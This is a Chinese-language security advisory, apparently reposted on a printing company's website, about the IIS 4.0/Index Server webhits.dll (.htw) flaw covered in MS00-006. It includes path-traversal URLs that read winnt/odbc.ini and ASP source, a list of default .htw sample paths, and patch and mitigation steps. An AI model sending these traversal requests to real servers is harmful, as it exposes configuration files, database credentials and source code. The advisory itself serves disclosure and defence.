虚拟web目录轻易泄露ASP源代码 (MS,缺陷)-会员卡,广州印刷,深圳印刷,印刷公司,名片,彩页,名片设计,设计教程,名片制作,彩色名片,名片模板,贵宾卡,pvc卡,设计欣赏,深圳名片,广州名片,business card design

首页	名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash

» 彩色名片
» PVC卡
» 彩色磁性卡
» 彩页/画册
» 个性印务
» 彩色不干胶
» 明信片
   » 明信片
   » 彩色书签
   » 门挂
» 其他产品与服务
   » 创业锦囊
   » 办公用品
   » 信封、信纸
   » 便签纸、斜面纸砖
   » 无碳复印纸
   » 海报
   » 大篇幅印刷
   » KT板
   » 海报
   » 横幅

虚拟web目录轻易泄露ASP源代码 (MS,缺陷)
涉及程序：
Microsoft Internet Information Server/Index Server

描述：
震撼安全发现:新的漏洞答应查看web服务器上任何文件包括ASP源码

具体：
IIS4.0上有一个应用程序映射htw--->webhits.dll，这是用于Index Server的点击功能的。尽管你不运行Index Server，该映
射仍旧有效。这个应用程序映射存在漏洞，答应入侵者读取本地硬盘上的文件，数据库文件，和ASP源代码!
有两种方式来实现，第一，假如你的web server上存在.htw后缀的文件，则可以过下面的方法来查看文件内容，比如查看
odbc.ini文件的内容:

http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?
CiWebHitsFile=/../../winnt/odbc.ini&CiRestriction=none&CiHiliteType=Full

对于IIS的一般安装模式可以在下列位置找到.htw文件:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw

第二、假如你的web server上不存在这个文件，有漏洞的系统仍旧答应用户调用webhits.dll，详细方法如下：

http://www.xxx.com/default.htm%20%20%20%20%20.htw?
CiWebHitsFile=/../../winnt/odbc.ini&CiRestriction=none&CiHiliteType=Full
条件是default.htm必须存在。这个文件名可以是其它文件，但必须存在。webhits.dll将会把这个文件作为临时文件打开。当上
述URL中的空格符%20达到一定数目时，web服务的识别功能可能会出现问题，这样webhits.dll将打开指定的文件
winntodbc.ini。假如成功，用同样的方式可以打开更多的文件，包括ASP代码。近似的原理请见下面这段代码：

FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)

{
// Just in case inetinfo.exe passes too long a string
// let\\'s make sure it\\'s of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}

解决方案：
不使用index server功能的用户，可以在IIS治理控制台中，点 web站点，属性，选择主目录，配置（起始点），应用程序映射，
将htw与webhits.dll的映射删除。
假如要用到webhits.dll，则使用下面的补丁：
Index Server 2.0(Intel机器)的补丁
Index Server 2.0(Alpha机器)的补丁
Windows2000的Index Server服务补丁

安全建议：
建议在IIS控制台中删除无用的应用程序映射

相关站点：
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

from: http://www.cnns.net/article/db/49.htm

返回类别: 教程
上一教程: 最新的JMail（4.3版本）发送代码
下一教程: VBScript与JScript谁怕谁(6)

您可以阅读与"虚拟web目录轻易泄露ASP源代码 (MS,缺陷)"相关的教程:
· MS IIS虚拟主机ASP源码泄露 (MS,缺陷)
· 可以查看源代码的ASP程序
· ASP生成柱型体、折线图、饼图源代码
· ASP获取客户端MAC地址(源代码）
· 关于解决商务平台ASP程序的源代码泄漏设想与思索


	快精灵印艺坊版权所有	首页会员中心在线印刷在线编辑付款方式索取样品设计指南连锁门店网站地图关于我们友情链接